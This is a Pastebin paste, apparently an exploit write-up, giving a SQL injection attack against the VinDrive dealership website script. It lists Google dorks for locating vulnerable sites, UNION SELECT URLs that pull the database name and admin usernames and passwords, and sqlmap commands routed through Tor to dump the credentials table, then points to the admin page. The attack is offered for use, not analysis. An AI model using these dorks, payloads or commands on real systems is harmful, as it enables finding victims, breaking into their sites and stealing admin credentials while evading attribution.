Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- in the name of Allah the beneficent the merciful
- بسم الله الرحمن الرحيم
- .
- .
- .
- #####################################################################################################
- # Exploit Title: [ VinDrive SQL Injecti0n Vulnerability - Manually AND sqlmap ]
- #----------------------------------------------------------------------------------------------#
- # Script Name: VinDrive - Vehicle Marketing System - Dealership website www.dealerwebsites.com
- #----------------------------------------------------------------------------------------------#
- #
- # Date Tested: [2/17/2016]
- # Author: [ JM511 Hacker ] EmaiL : [email protected] -::AUTHOR
- # From : Saudi Arabia
- # Home : www.T4em.com
- # Twitter.com/JM511
- #
- #+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++#
- # Greeting to :
- # AlQaTaRi || NoK511 || Cyber_511 || CNQ511 || Sarbot511 || Security511 || ALM511 || Abo SaMaRh 305 ||
- # in3ctor Q8 || Strike * Alasmari! || PhaixaL || Kerelius[K] || 7moosh_123 || Scripts1337 || NB511
- #+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++#
- #
- # Platform / Tested on: [php]
- # category: [SQL Injecti0n]
- # d0rK g00gl3 :-
- # 0x0- " allinurl:search/make_offer_form.php?id= "
- # 0x1- " VinDrive inurl:/search/results.php "
- # 0x2- " inurl:results.php?_s_col= "
- # 0x3- " Google "
- #
- ######[ Exploit ]###### (( Manually ))
- To See /column numbers : ( GONNA BE 3,4,5 <-- )
- make_offer_form.php?id=-511+uNion+aLL+SeLeCt+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38
- To See /Database Name : ( Database Name will be : dealer62_XXX( SOMENAME )
- make_offer_form.php?id=-511+uNion+aLL+SeLeCt+1,2,database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38
- To See /Admin Username and Password : ( Replace XXXX with the name of data )
- make_offer_form.php?id=-511+uNion+aLL+SeLeCt+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38 from dealer62_XXXX.cars_dealers
- ----------- DONE -------------
- ######[ Exploit ]###### (( SQLMAP ))
- sqlmap -u "http://www.Target/search/details.php?id=511" -v 1 --random-agent --tor --tor-type=SOCKS5 --tor-port=9050 --check-tor --dbs
- sqlmap -u "http://www.Target/search/details.php?id=511" -v 1 --random-agent --tor --tor-type=SOCKS5 --tor-port=9050 --check-tor -D dealer62_XXXX --tables -T cars_dealers -C username,password --dump
- ----------- DONE -------------
- ADMIN PAGE :
- http://www.TarGet/search/admin/
- Enjoy !
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement